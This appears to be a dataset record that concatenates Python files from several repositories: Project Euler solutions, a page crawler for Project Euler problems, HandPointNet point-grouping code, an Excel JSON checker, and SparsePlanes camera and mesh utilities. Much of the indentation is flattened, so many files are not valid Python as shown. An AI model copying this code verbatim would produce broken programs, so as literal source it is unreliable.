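        total += 4 * s * s - 6 * (s - 1)
    return total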
def solution():
m = matrix(1001)
ds = diagonalSum(m)
print(ds)
solution()
```
#### File: Project.Euler/Answers.Python/52.py
```python
__author__ = '<NAME>'
__date__ = 'July 18, 2015'
def number2digits(number):
string = str(number)
digits = []
for s in string:
digits.append(int(s))
return sorted(digits)
def hasSameDigits(number1, number2):
digits1 = number2digits(number1)
digits2 = number2digits(number2)
if digits1 == digits2:
return True
else:
return False
def multiplesOfNumber(number, n):
times = range(1, n+1)
multiples = []
for i in times:
multiple = number * i
multiples.append(multiple)
return multiples
def isQualified(number, n):
multiples = multiplesOfNumber(number, n)
sameDigits = []
for m in multiples:
sameDigits.append(hasSameDigits(number, m))
if all(sameDigits):
return True
else:
return False
def permutedMultiples(n):
number = 1
while not isQualified(number, n):
number += 1
pMultiple = multiplesOfNumber(number, n)
return (number, pMultiple)
def solution():
number = permutedMultiples(2)
print(number)
solution()
```
#### File: Project.Euler/Answers.Python/55.py
```python
__author__ = '<NAME>'
__date__ = 'July 17, 2015'
def rotateDigits(number):
string = str(number)
rotatedString = string[::-1]
rotatedNumber = int(rotatedString)
return rotatedNumber
def isSymmetrical(number):
rotatedNumber = rotateDigits(number)
if rotatedNumber == number:
return True
else:
return False
def isLychrelNumber(number):
iterTimes = 0
rotatedNumber = rotateDigits(number)
number = number + rotatedNumber
while iterTimes < 50:
if isSymmetrical(number):
return False
else:
rotatedNumber = rotateDigits(number)
number = number + rotatedNumber
iterTimes += 1
if iterTimes >= 50:
return True
def LychrelNumbers(UPPER_BOUND):
number = 1
lNumbers = []
while number < UPPER_BOUND:
if isLychrelNumber(number):
lNumbers.append(number)
number += 1
else:
number += 1
numberOfLychrelNumbers = len(lNumbers)
return (numberOfLychrelNumbers, lNumbers)
def solution():
UPPER_BOUND = 10000
LN_Info = LychrelNumbers(UPPER_BOUND)
print(LN_Info)
solution()
```
#### File: Crawler.Python/old/PEC2.py
```python
import urllib
import urllib2
def PEC(number):
    # Build the problem URL directly; urllib2 needs a Request object
    # (urllib2.request is not callable) and the site addresses problems
    # as /problem=<number>.
    url = "https://projecteuler.net/problem=" + str(number)
    request = urllib2.Request(url)
    response = urllib2.urlopen(request)
    result = response.read()
ext = '.html'
filename = str(number) + ext
f = open(filename, 'w')
f.write(result)
print(filename + " downloaded")
f.close()
numbers = range(1, 505)
for i in numbers:
PEC(i)
```
#### File: Crawler.Python/old/PEC.py
```python
import urllib.parse
import urllib.request
def PEC(number):
basic_url = "https://projecteuler.net/problem="
url = basic_url + str(number)
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
    result = response.read().decode('utf-8')
loc = '../Problems/pages/'
ext = '.html'
filename = loc + str(number) + ext
f = open(filename, 'w')
f.write(result)
print(filename + " downloaded")
f.close()
numbers = range(465, 505)
for i in numbers:
PEC(i)
``` |
{
"source": "JinliEmma/HandPointNet",
"score": 2
} |
#### File: HandPointNet/train_eval/utils.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
# import pdb
def group_points(points, opt):
# group points using knn and ball query
# points: B * 1024 * 6
cur_train_size = len(points)
inputs1_diff = points[:, :, 0:3].transpose(1, 2).unsqueeze(1).expand(cur_train_size, opt.sample_num_level1, 3, opt.SAMPLE_NUM) \
- points[:, 0:opt.sample_num_level1, 0:3].unsqueeze(-1).expand(
cur_train_size, opt.sample_num_level1, 3, opt.SAMPLE_NUM) # B * 512 * 3 * 1024
inputs1_diff = torch.mul(
inputs1_diff, inputs1_diff) # B * 512 * 3 * 1024
inputs1_diff = inputs1_diff.sum(2) # B * 512 * 1024
# dists: B * 512 * 64; inputs1_idx: B * 512 * 64
dists, inputs1_idx = torch.topk(
inputs1_diff, opt.knn_K, 2, largest=False, sorted=False)
# ball query
invalid_map = dists.gt(opt.ball_radius) # B * 512 * 64
for jj in range(opt.sample_num_level1):
inputs1_idx[:, jj, :][invalid_map[:, jj, :]] = jj
idx_group_l1_long = inputs1_idx.view(cur_train_size, opt.sample_num_level1*opt.knn_K, 1).expand(
cur_train_size, opt.sample_num_level1*opt.knn_K, opt.INPUT_FEATURE_NUM)
inputs_level1 = points.gather(1, idx_group_l1_long).view(
cur_train_size, opt.sample_num_level1, opt.knn_K, opt.INPUT_FEATURE_NUM) # B*512*64*6
inputs_level1_center = points[:, 0:opt.sample_num_level1, 0:3].unsqueeze(
2) # B*512*1*3
inputs_level1[:, :, :, 0:3] = inputs_level1[:, :, :, 0:3] - \
inputs_level1_center.expand(
cur_train_size, opt.sample_num_level1, opt.knn_K, 3)
inputs_level1 = inputs_level1.unsqueeze(
1).transpose(1, 4).squeeze(4) # B*6*512*64
inputs_level1_center = inputs_level1_center.contiguous(
).view(-1, 1, opt.sample_num_level1, 3).transpose(1, 3) # B*3*512*1
return inputs_level1, inputs_level1_center
# inputs_level1: B*INPUT_FEATURE_NUM*sample_num_level1*knn_K, inputs_level1_center: B*3*sample_num_level1*1
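def _group_points_example():
    # Usage sketch (not part of the original file): `opt` is a stand-in
    # namespace carrying the attributes group_points reads; the ball radius
    # value here is only illustrative.
    from argparse import Namespace
    opt = Namespace(SAMPLE_NUM=1024, sample_num_level1=512, knn_K=64,
                    ball_radius=0.015, INPUT_FEATURE_NUM=6)
    points = torch.rand(2, opt.SAMPLE_NUM, opt.INPUT_FEATURE_NUM)
    inputs_level1, centers = group_points(points, opt)
    # inputs_level1: 2 x 6 x 512 x 64, centers: 2 x 3 x 512 x 1
    return inputs_level1.shape, centers.shape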
def group_points_2(points, sample_num_level1, sample_num_level2, knn_K, ball_radius):
# group points using knn and ball query
# points: B*(3+128)*512
cur_train_size = points.size(0)
inputs1_diff = points[:, 0:3, :].unsqueeze(1).expand(cur_train_size, sample_num_level2, 3, sample_num_level1) \
- points[:, 0:3, 0:sample_num_level2].transpose(1, 2).unsqueeze(-1).expand(
cur_train_size, sample_num_level2, 3, sample_num_level1) # B * 128 * 3 * 512
inputs1_diff = torch.mul(inputs1_diff, inputs1_diff) # B * 128 * 3 * 512
inputs1_diff = inputs1_diff.sum(2) # B * 128 * 512
# dists: B * 128 * 64; inputs1_idx: B * 128 * 64
dists, inputs1_idx = torch.topk(
inputs1_diff, knn_K, 2, largest=False, sorted=False)
# ball query
# B * 128 * 64, invalid_map.float().sum()
invalid_map = dists.gt(ball_radius)
# pdb.set_trace()
for jj in range(sample_num_level2):
inputs1_idx.data[:, jj, :][invalid_map.data[:, jj, :]] = jj
idx_group_l1_long = inputs1_idx.view(cur_train_size, 1, sample_num_level2*knn_K).expand(
cur_train_size, points.size(1), sample_num_level2*knn_K)
inputs_level2 = points.gather(2, idx_group_l1_long).view(
cur_train_size, points.size(1), sample_num_level2, knn_K) # B*131*128*64
inputs_level2_center = points[:, 0:3, 0:sample_num_level2].unsqueeze(
3) # B*3*128*1
inputs_level2[:, 0:3, :, :] = inputs_level2[:, 0:3, :, :] - \
inputs_level2_center.expand(
cur_train_size, 3, sample_num_level2, knn_K) # B*3*128*64
return inputs_level2, inputs_level2_center
# inputs_level2: B*131*sample_num_level2*knn_K, inputs_level2_center: B*3*sample_num_level2*1
``` |
{
"source": "JINLINBI/skynet",
"score": 3
} |
#### File: excel/json/check.py
```python
import json
import os
import re
data = {}
COLOR_RED = "\033[31m"
COLOR_GREEN = "\033[32m"
COLOR_YELLOW = "\033[33m"
COLOR_BRIGHT_MAGENTA = "\033[95m"
COLOR_BRIGHT_YELLOW = "\033[93m"
COLOR_CLEAR = "\033[0m"
EXCEL_FILES_ROOT = "../"
# add support type field here
support_type = {
"number",
"integer",
"string",
"int[]",
}
# add support name field here
support_col = {
"name",
"type",
"index",
}
def check_support_type(type):
return type in support_type
def check_support_col(name):
return name in support_col
col_name_set = set()
def check_col_repeated(data, reset = False):
global col_name_set
if reset:
col_name_set = set()
if data in col_name_set:
return True
col_name_set.add(data)
return False
def check_col_require(data):
if "name" not in data:
print(COLOR_RED + "missing index \"name\"!" + COLOR_CLEAR)
return False
if "type" not in data:
print(COLOR_RED + "missing index \"type\"!" + COLOR_CLEAR)
return False
return True
def check_fields_field(data):
if data == None:
return False
check_col_repeated("", True)
for col in data:
check_col_require(col)
for k, item in col.items():
if not check_support_col(k):
print(COLOR_YELLOW + "name field: \"" + k + "\" is" + " not suppported" + COLOR_CLEAR)
continue
elif k == "name" and check_col_repeated(item):
print(COLOR_RED + "name field: \"" + item + "\" repeated!" + COLOR_CLEAR)
elif k == "type" and not check_support_type(item):
print(COLOR_YELLOW + "type field: \"" + item + "\" is " + "not suppported." + COLOR_CLEAR)
continue
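# Example field list (sketch, added for illustration) that check_fields_field
# accepts without warnings: every column has a unique "name" and a supported "type".
EXAMPLE_FIELDS = [
    {"name": "id", "type": "integer", "index": 1},
    {"name": "title", "type": "string", "index": 2},
]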
def check_txt_files(filename):
m = re.search('\.txt$', filename)
if m is None:
return
print(COLOR_BRIGHT_YELLOW + "checking txt file: " + filename + COLOR_CLEAR)
check_col_repeated("", True)
with open(filename, 'r') as f:
for line in f.readlines():
words = line.split('\t')
for word in words:
print("word: " + word)
            # check repeated id (first column of the row)
            if check_col_repeated(words[0]):
                print(COLOR_RED + "id " + COLOR_BRIGHT_YELLOW + words[0] + COLOR_RED + " repeated!" + COLOR_CLEAR)
def check_files_field(data):
if data == None:
return
for filename in data:
check_txt_files(EXCEL_FILES_ROOT + filename + ".txt")
def check_json_file(filename):
m = re.search('\.json$', filename)
if m is None:
return
print(COLOR_GREEN + "checking json file: " + filename + COLOR_CLEAR)
data = {}
with open(filename, 'r') as f:
data = json.load(f)
check_fields_field(data["fields"])
check_files_field(data["files"])
def walk_dir_func(func, dirt, exclude = False):
for root, dirs, files in os.walk(EXCEL_FILES_ROOT):
# get files root dirs
print("dir: " + root)
hit = False
if exclude and root != EXCEL_FILES_ROOT + dirt:
hit = True
elif not exclude and root == EXCEL_FILES_ROOT + dirt:
hit = True
if hit:
for file in files:
print("file: " + os.path.join(root, file))
func(os.path.join(root, file))
if __name__ == "__main__":
# check_json_file("item_list.json")
walk_dir_func(check_json_file, "json")
``` |
{
"source": "jinlinyi/SparsePlanes",
"score": 2
} |
#### File: modeling/camera_net/camera_head.py
```python
import torch
import fvcore.nn.weight_init as weight_init
from torch import nn
from torch.nn import functional as F
from detectron2.utils.registry import Registry
__all__ = ["build_camera_head", "PlaneRCNNCameraHead", "CAMERA_HEAD_REGISTRY"]
CAMERA_HEAD_REGISTRY = Registry("CAMERA_HEAD")
CAMERA_HEAD_REGISTRY.__doc__ = """
Registry for camera head in a generalized R-CNN model.
It takes feature maps from two images and predict relative camera transformation.
The registered object will be called with `obj(cfg, input_shape)`.
The call is expected to return an :class:`nn.module`.
"""
def build_camera_head(cfg):
"""
Build ROIHeads defined by `cfg.MODEL.ROI_HEADS.NAME`.
"""
name = cfg.MODEL.CAMERA_HEAD.NAME
return CAMERA_HEAD_REGISTRY.get(name)(cfg)
def conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=None):
return nn.Sequential(
nn.Conv2d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
),
nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.01),
nn.LeakyReLU(inplace=True),
)
def deconv2d(
scale_factor=2,
mode="nearest",
in_channels=256,
out_channels=128,
kernel_size=3,
stride=1,
padding=1,
):
return nn.Sequential(
torch.nn.Upsample(scale_factor=scale_factor, mode=mode),
nn.Conv2d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
),
nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.01),
nn.ReLU(inplace=True),
)
@CAMERA_HEAD_REGISTRY.register()
class PlaneRCNNCameraHead(nn.Module):
"""
The camera head for Plane RCNN
"""
def __init__(self, cfg):
super(PlaneRCNNCameraHead, self).__init__()
self.backbone_feature = cfg.MODEL.CAMERA_HEAD.BACKBONE_FEATURE
if self.backbone_feature == "p5":
self.convs_backbone = nn.Sequential(
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
)
elif self.backbone_feature == "p4":
self.convs_backbone = nn.Sequential(
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.MaxPool2d(
kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False
),
conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1),
conv2d(in_channels=512, out_channels=512, kernel_size=3, padding=1),
)
elif self.backbone_feature == "p3":
self.convs_backbone = nn.Sequential(
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.MaxPool2d(
kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False
),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.MaxPool2d(
kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False
),
conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1),
conv2d(in_channels=512, out_channels=512, kernel_size=3, padding=1),
)
for block in self.convs_backbone:
if isinstance(block, nn.modules.container.Sequential):
for layer in block:
if isinstance(layer, nn.Conv2d):
weight_init.c2_msra_fill(layer)
else:
raise NotImplementedError
self.convs = nn.Sequential(
conv2d(in_channels=300, out_channels=128, kernel_size=3, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1),
)
self.fc = nn.Linear(768, cfg.MODEL.CAMERA_HEAD.FEATURE_SIZE)
self.trans_branch = nn.Linear(
cfg.MODEL.CAMERA_HEAD.FEATURE_SIZE, cfg.MODEL.CAMERA_HEAD.TRANS_CLASS_NUM
)
self.rot_branch = nn.Linear(
cfg.MODEL.CAMERA_HEAD.FEATURE_SIZE, cfg.MODEL.CAMERA_HEAD.ROTS_CLASS_NUM
)
self._loss_weight = cfg.MODEL.CAMERA_HEAD.LOSS_WEIGHT
self.celoss = nn.CrossEntropyLoss()
def forward(self, features1, features2, gt_cls=None):
"""
p2 256*120*160
p3 256*60*80
p4 256*30*40
p5 256*15*20
p6 256*8*10
"""
x1 = self.backbone(features1)
x2 = self.backbone(features2)
aff = self.compute_corr_softmax(x1, x2)
x = self.convs(aff)
x = torch.flatten(x, 1)
x = F.relu(self.fc(x))
trans = self.trans_branch(x)
rot = self.rot_branch(x)
if self.training:
tran_loss = self.celoss(trans, gt_cls["tran_cls"].squeeze(1))
rot_loss = self.celoss(rot, gt_cls["rot_cls"].squeeze(1))
losses = {"camera_loss": tran_loss + rot_loss}
if torch.isnan(tran_loss) or torch.isnan(rot_loss):
import pdb; pdb.set_trace()
return losses
else:
return {"tran": trans, "rot": rot}
def backbone(self, features):
x = self.convs_backbone(features[self.backbone_feature])
return x
def compute_corr_softmax(self, im_feature1, im_feature2):
_, _, h1, w1 = im_feature1.size()
_, _, h2, w2 = im_feature2.size()
im_feature2 = im_feature2.transpose(2, 3)
im_feature2_vec = im_feature2.contiguous().view(
im_feature2.size(0), im_feature2.size(1), -1
)
im_feature2_vec = im_feature2_vec.transpose(1, 2)
im_feature1_vec = im_feature1.contiguous().view(
im_feature1.size(0), im_feature1.size(1), -1
)
corrfeat = torch.matmul(im_feature2_vec, im_feature1_vec)
corrfeat = corrfeat.view(corrfeat.size(0), h2 * w2, h1, w1)
corrfeat = F.softmax(corrfeat, dim=1)
return corrfeat
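def _corr_softmax_shape_example():
    """Shape sketch (added for illustration, not used by the model).

    compute_corr_softmax only touches its tensor arguments, so it can be
    exercised without building a full config: two B x C x H x W feature maps
    yield a B x (H*W) x H x W affinity volume that sums to one over dim 1.
    """
    f1 = torch.rand(2, 16, 8, 10)
    f2 = torch.rand(2, 16, 8, 10)
    aff = PlaneRCNNCameraHead.compute_corr_softmax(None, f1, f2)
    # aff.shape == (2, 80, 8, 10); aff.sum(dim=1) is all ones.
    return aff.shape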
```
#### File: sparseplane/utils/mesh_utils.py
```python
import cv2
import os
import shutil
import quaternion
import torch
import numpy as np
from typing import Optional
import imageio
from tqdm import tqdm
from pytorch3d.structures import Meshes
from pytorch3d.renderer import TexturesVertex
from pytorch3d.structures import utils as struct_utils
from sparseplane.utils.camera import (
create_cylinder_mesh,
create_color_palette,
get_cone_edges,
)
def transform_meshes(meshes, camera_info):
"""
input:
@meshes: mesh in local frame
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
mesh in global frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
verts_packed = meshes.verts_packed()
verts_packed = verts_packed * torch.tensor(
[1.0, -1.0, -1.0], dtype=torch.float32
) # suncg2habitat
faces_list = meshes.faces_list()
tex = meshes.textures
rot_matrix = torch.tensor(quaternion.as_rotation_matrix(rot), dtype=torch.float32)
verts_packed = torch.mm(rot_matrix, verts_packed.T).T + torch.tensor(
tran, dtype=torch.float32
)
verts_list = list(verts_packed.split(meshes.num_verts_per_mesh().tolist(), dim=0))
return Meshes(verts=verts_list, faces=faces_list, textures=tex)
def rotate_mesh_for_webview(meshes):
"""
input:
@meshes: mesh in global (habitat) frame
output:
mesh is rotated around x axis by -11 degrees such that floor is horizontal
"""
verts_packed = meshes.verts_packed()
faces_list = meshes.faces_list()
tex = meshes.textures
rot_matrix = torch.FloatTensor(
np.linalg.inv(
np.array([[1, 0, 0], [0, 0.9816272, -0.1908090], [0, 0.1908090, 0.9816272]])
)
)
verts_packed = torch.mm(rot_matrix, verts_packed.T).T
verts_list = list(verts_packed.split(meshes.num_verts_per_mesh().tolist(), dim=0))
return Meshes(verts=verts_list, faces=faces_list, textures=tex)
def transform_verts_list(verts_list, camera_info):
"""
input:
@meshes: verts_list in local frame
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
verts_list in global frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
verts_list_to_packed = struct_utils.list_to_packed(verts_list)
verts_packed = verts_list_to_packed[0]
num_verts_per_mesh = verts_list_to_packed[1]
verts_packed = verts_packed * torch.tensor(
[1.0, -1.0, -1.0], dtype=torch.float32
) # suncg2habitat
rot_matrix = torch.tensor(quaternion.as_rotation_matrix(rot), dtype=torch.float32)
verts_packed = torch.mm(rot_matrix, verts_packed.T).T + torch.tensor(
tran, dtype=torch.float32
)
verts_list = list(verts_packed.split(num_verts_per_mesh.tolist(), dim=0))
return verts_list
def get_plane_params_in_global(planes, camera_info):
"""
input:
@planes: plane params
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
plane parameters in global frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
start = np.ones((len(planes), 3)) * tran
end = planes * np.array([1, -1, -1]) # suncg2habitat
end = (quaternion.as_rotation_matrix(rot) @ (end).T).T + tran # cam2world
a = end
b = end - start
planes_world = ((a * b).sum(axis=1) / np.linalg.norm(b, axis=1) ** 2).reshape(-1, 1) * b
return planes_world
def get_plane_params_in_local(planes, camera_info):
"""
input:
@planes: plane params
@camera_info: plane params from camera info, type = dict, must contain 'position' and 'rotation' as keys
output:
        plane parameters in local (camera) frame.
"""
tran = camera_info["position"]
rot = camera_info["rotation"]
b = planes
a = np.ones((len(planes), 3)) * tran
planes_world = (
a
+ b
- ((a * b).sum(axis=1) / np.linalg.norm(b, axis=1) ** 2).reshape(-1, 1) * b
)
end = (
quaternion.as_rotation_matrix(rot.inverse()) @ (planes_world - tran).T
).T # world2cam
planes_local = end * np.array([1, -1, -1]) # habitat2suncg
return planes_local
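def _plane_params_round_trip_example():
    """Consistency sketch (added for illustration, not used elsewhere).

    Converting plane parameters from the camera frame to the global frame and
    back should recover the original offset*normal vectors; the camera pose
    below is arbitrary.
    """
    cam = {
        "position": np.array([0.5, 0.1, -0.2]),
        "rotation": np.quaternion(1, 0, 0, 0),
    }
    planes = np.array([[0.0, 0.0, 2.0], [1.0, 1.0, 1.0]])
    recovered = get_plane_params_in_local(
        get_plane_params_in_global(planes, cam), cam
    )
    return np.allclose(recovered, planes)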
def save_obj(
folder,
prefix,
meshes,
cam_meshes=None,
decimal_places=None,
blend_flag=False,
map_files=None,
uv_maps=None,
):
os.makedirs(folder, exist_ok=True)
# pytorch3d does not support map_files
# map_files = meshes.textures.map_files()
# assert map_files is not None
if map_files is None and uv_maps is None:
raise RuntimeError("either map_files or uv_maps should be set!")
# generate map_files from uv_map
if uv_maps is not None and map_files is None:
map_files = []
uv_dir = os.path.join(folder, "uv_maps")
if not os.path.exists(uv_dir):
os.mkdir(uv_dir)
for map_id, uv_map in enumerate(uv_maps):
uv_path = os.path.join(uv_dir, "{}_uv_plane_{}.png".format(prefix, map_id))
imageio.imwrite(uv_path, uv_map)
map_files.append(uv_path)
f_mtl = open(os.path.join(folder, prefix + ".mtl"), "w")
f = open(os.path.join(folder, prefix + ".obj"), "w")
try:
seen = set()
uniq_map_files = [
m for m in list(map_files) if m not in seen and not seen.add(m)
]
for map_id, map_file in enumerate(uniq_map_files):
if uv_maps is not None:
# we do not need to copy map_files,
# they are already in uv_maps/...
f_mtl.write(
_get_mtl_map(
os.path.basename(map_file).split(".")[0],
os.path.join("uv_maps", os.path.basename(map_file)),
)
)
continue
if not blend_flag:
shutil.copy(map_file, folder)
os.chmod(os.path.join(folder, os.path.basename(map_file)), 0o755)
f_mtl.write(
_get_mtl_map(
os.path.basename(map_file).split(".")[0],
os.path.basename(map_file),
)
)
else:
rgb = cv2.imread(map_file, cv2.IMREAD_COLOR)
if cam_meshes is not None:
blend_color = (
np.array(
cam_meshes.textures.verts_features_packed()
.numpy()
.tolist()[map_id]
)
* 255
)
else:
blend_color = np.array(create_color_palette()[map_id + 10])
alpha = 0.7
blend = (rgb * alpha + blend_color[::-1] * (1 - alpha)).astype(np.uint8)
cv2.imwrite(
os.path.join(
folder, os.path.basename(map_file).split(".")[0] + "_debug.png"
),
blend,
)
f_mtl.write(
_get_mtl_map(
os.path.basename(map_file).split(".")[0],
os.path.basename(map_file).split(".")[0] + "_debug.png",
)
)
f.write(f"mtllib {prefix}.mtl\n\n")
# we want [list] verts, vert_uvs, map_files;
# [packed] faces;
# face per mesh
verts_list = meshes.verts_list()
verts_uvs_list = meshes.textures.verts_uvs_list()
faces_list = meshes.faces_packed().split(
meshes.num_faces_per_mesh().tolist(), dim=0
)
for idx, (verts, verts_uvs, faces, map_file) in enumerate(
zip(verts_list, verts_uvs_list, faces_list, map_files)
):
f.write(f"# mesh {idx}\n")
trunc_verts_uvs = verts_uvs[: verts.shape[0]]
_save(
f,
verts,
faces,
verts_uv=trunc_verts_uvs,
map_file=map_file,
idx=idx,
decimal_places=decimal_places,
)
if cam_meshes:
face_offset = np.sum([len(v) for v in verts_list])
cam_verts_list = cam_meshes.verts_list()
cam_verts_rgbs_list = (
cam_meshes.textures.verts_features_packed().numpy().tolist()
)
cam_faces_list = (cam_meshes.faces_packed() + face_offset).split(
cam_meshes.num_faces_per_mesh().tolist(), dim=0
)
assert len(cam_verts_rgbs_list) == len(cam_verts_list)
for idx, (verts, faces, rgb) in enumerate(
zip(cam_verts_list, cam_faces_list, cam_verts_rgbs_list)
):
f.write(f"# camera {idx}\n")
f_mtl.write(_get_mtl_rgb(idx, rgb))
_save(f, verts, faces, rgb=rgb, idx=idx, decimal_places=decimal_places)
finally:
f.close()
f_mtl.close()
def _get_mtl_map(material_name, map_Kd):
return f"""newmtl {material_name}
map_Kd {map_Kd}
# Test colors
Ka 1.000 1.000 1.000 # white
Kd 1.000 1.000 1.000 # white
Ks 0.000 0.000 0.000 # black
Ns 10.0\n"""
def _get_mtl_rgb(material_idx, rgb):
return f"""newmtl color_{material_idx}
Kd {rgb[0]} {rgb[1]} {rgb[2]}
Ka 0.000 0.000 0.000\n"""
def _save(
f,
verts,
faces,
verts_uv=None,
map_file=None,
rgb=None,
idx=None,
double_sided=True,
decimal_places: Optional[int] = None,
):
if decimal_places is None:
float_str = "%f"
else:
float_str = "%" + ".%df" % decimal_places
lines = ""
V, D = verts.shape
for i in range(V):
vert = [float_str % verts[i, j] for j in range(D)]
lines += "v %s\n" % " ".join(vert)
if verts_uv is not None:
V, D = verts_uv.shape
for i in range(V):
vert_uv = [float_str % verts_uv[i, j] for j in range(D)]
lines += "vt %s\n" % " ".join(vert_uv)
if map_file is not None:
lines += f"usemtl {os.path.basename(map_file).split('.')[0]}\n"
elif rgb is not None:
lines += f"usemtl color_{idx}\n"
    if len(faces) > 0:
F, P = faces.shape
for i in range(F):
if verts_uv is not None:
face = ["%d/%d" % (faces[i, j] + 1, faces[i, j] + 1) for j in range(P)]
else:
face = ["%d" % (faces[i, j] + 1) for j in range(P)]
lines += "f %s\n" % " ".join(face)
if double_sided:
if verts_uv is not None:
face = [
"%d/%d" % (faces[i, j] + 1, faces[i, j] + 1)
for j in reversed(range(P))
]
else:
face = ["%d" % (faces[i, j] + 1) for j in reversed(range(P))]
lines += "f %s\n" % " ".join(face)
else:
tqdm.write(f"face = []")
f.write(lines)
def get_camera_meshes(camera_list, radius=0.02):
verts_list = []
faces_list = []
color_list = []
rots = np.array(
[
quaternion.as_rotation_matrix(camera_info["rotation"])
for camera_info in camera_list
]
)
# ai habitat frame
lookat = np.array([0, 0, -1])
vertical = np.array([0, 1, 0])
positions = np.array([camera_info["position"] for camera_info in camera_list])
lookats = rots @ lookat.T
verticals = rots @ vertical.T
predetermined_color = [
[0.10196, 0.32157, 1.0],
[1.0, 0.0667, 0.1490],
]
for idx, (position, lookat, vertical, color) in enumerate(
zip(positions, lookats, verticals, predetermined_color)
):
cur_num_verts = 0
edges = get_cone_edges(position, lookat, vertical)
cam_verts = []
cam_inds = []
for k in range(len(edges)):
cyl_verts, cyl_ind = create_cylinder_mesh(radius, edges[k][0], edges[k][1])
cyl_verts = [x for x in cyl_verts]
cyl_ind = [x + cur_num_verts for x in cyl_ind]
cur_num_verts += len(cyl_verts)
cam_verts.extend(cyl_verts)
cam_inds.extend(cyl_ind)
# Create a textures object
verts_list.append(torch.tensor(cam_verts, dtype=torch.float32))
faces_list.append(torch.tensor(cam_inds, dtype=torch.float32))
color_list.append(color)
color_tensor = torch.tensor(color_list, dtype=torch.float32).unsqueeze_(1)
tex = TexturesVertex(verts_features=color_tensor)
# Initialise the mesh with textures
meshes = Meshes(verts=verts_list, faces=faces_list, textures=tex)
return meshes
```
#### File: sparseplane/utils/metrics.py
```python
import torch
import numpy as np
@torch.no_grad()
def compare_planes(
pred_planes,
gt_planes,
):
"""
    Compute pairwise distances between predicted and ground-truth planes:
    the angle between plane normals (in degrees) and the l1 distance between offsets.
"""
pred_planes = torch.tensor(np.array(pred_planes), dtype=torch.float32)
pred_offsets = torch.norm(pred_planes, p=2, dim=1) + 1e-5
pred_norms = pred_planes.div(pred_offsets.view(-1, 1).expand_as(pred_planes))
gt_planes = torch.tensor(np.array(gt_planes), dtype=torch.float32)
gt_offsets = torch.norm(gt_planes, p=2, dim=1) + 1e-5
gt_norms = gt_planes.div(gt_offsets.view(-1, 1).expand_as(gt_planes))
norm_distance_matrix = torch.clamp(torch.cdist(pred_norms, gt_norms, p=2), 0, 2)
norm_angle_matrix = 2 * torch.asin(norm_distance_matrix / 2) / np.pi * 180
offset_distance_matrix = torch.cdist(
pred_offsets.view(-1, 1), gt_offsets.view(-1, 1), p=1
)
return {"norm": norm_angle_matrix, "offset": offset_distance_matrix}
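def _compare_planes_example():
    """Sketch (added for illustration): two predictions vs. one ground truth.

    The first prediction shares the ground-truth normal but differs in offset
    by 1; the second is orthogonal to it.
    """
    pred = [[0.0, 0.0, 2.0], [3.0, 0.0, 0.0]]
    gt = [[0.0, 0.0, 3.0]]
    out = compare_planes(pred, gt)
    # out["norm"] is approximately [[0.], [90.]] (degrees),
    # out["offset"] is approximately [[1.], [0.]]
    return out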
def compare_planes_one_to_one(
pred_planes,
gt_planes,
):
pred_planes = torch.tensor(np.array(pred_planes), dtype=torch.float32)
pred_offsets = torch.clamp(torch.norm(pred_planes, p=2, dim=1), min=1e-5)
pred_norms = pred_planes.div(pred_offsets.view(-1, 1).expand_as(pred_planes))
gt_planes = torch.tensor(np.array(gt_planes), dtype=torch.float32)
gt_offsets = torch.clamp(torch.norm(gt_planes, p=2, dim=1), min=1e-5)
gt_norms = gt_planes.div(gt_offsets.view(-1, 1).expand_as(gt_planes))
l2 = torch.norm(pred_planes - gt_planes, dim=1).numpy().mean()
norm = (
torch.acos(torch.clamp(torch.sum(pred_norms * gt_norms, dim=1), max=1, min=-1))
.numpy()
.mean()
)
offset = torch.abs(pred_offsets - gt_offsets).numpy().mean()
return {"l2": l2, "norm": norm, "offset": offset}
```
#### File: sparsePlane/tools/inference_sparse_plane.py
```python
import numpy as np
import argparse, os, cv2, torch, pickle, quaternion
import pycocotools.mask as mask_util
from collections import defaultdict
from tqdm import tqdm
from scipy.linalg import eigh
from scipy.ndimage.measurements import center_of_mass
from scipy.special import softmax
from scipy.optimize import least_squares
from detectron2.config import get_cfg
from detectron2.engine import DefaultPredictor
from detectron2.evaluation.coco_evaluation import instances_to_coco_json
from detectron2.data import detection_utils as utils
from detectron2.utils.visualizer import Visualizer
from pytorch3d.structures import join_meshes_as_batch
from sparseplane.config import get_sparseplane_cfg_defaults
from sparseplane.modeling.roi_heads.plane_loss import GeoConsistencyLoss
from sparseplane.utils.mesh_utils import (
save_obj,
get_camera_meshes,
transform_meshes,
rotate_mesh_for_webview,
get_plane_params_in_global,
get_plane_params_in_local,
)
